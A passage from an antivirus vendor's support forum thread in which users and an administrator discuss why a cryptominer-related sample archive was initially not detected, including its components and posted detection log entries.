Jump to content

Recommended Posts

Posted (edited)

It is from 2020 yet not detected by ESET? Very strange if the sample is not broken somehow which is unlikely based on the behavior on VT. 

Edited by SeriousHoax
  • Administrators
Posted

The archive contains NSSM potentially unsafe application which is detected. Besides that there is also an old file svchost.exe from 2018 which is detected by a few AVs but it's probably not malicious per se but loads a batch script from the Sqlite database OnTimer.db. The script download payload from a dead url which used to serve Win64/CoinMiner.OF potentially unwanted application in the past (detected since 2019). I've sent svchost.exe to the viruslab to find out if it's subject to detection or not.

Posted (edited)
4 hours ago, Marcos said:

The archive contains NSSM potentially unsafe application which is detected.

Is this only upon execution of the sample .exe? It was not detected upon file creation;

Eset_Sample.thumb.png.db15d86a239f0cacf9649c79cf37a60f.png

Ditto for LiveGuard analysis. Does LiveGuard ignore Eset PUA detections?

Quote

Time;Hash;File;Size;Category;Reason;Sent to;User
6/29/2024 5:24:06 PM;A268031D2E74F058CBB2AD984E4A5556F59CFCF8;C:\Users\18436\Downloads\9aaf2a66b2754921fe133385136dc6fbe7bc730d5302a002103980bdfc13a1be.exe;1070725;Executable;Automatic;ESET LiveGuard;xxxxxxxxxxx

-EDIT- I downloaded the sample again. Now Eset detects upon archive extraction;

Quote

Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
6/30/2024 12:13:36 PM;Real-time file system protection;file;C:\Users\xxxxxx\Downloads\9aaf2a66b2754921fe133385136dc6fbe7bc730d5302a002103980bdfc13a1be.exe;multiple detections;deleted;xxxxxxx;Event occurred on a new file created by the application: C:\Program Files\7-Zip\7zG.exe (755AF3328261B37426BC495C6C64BBA0C18870B2).;A268031D2E74F058CBB2AD984E4A5556F59CFCF8;

 

Edited by itman
Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...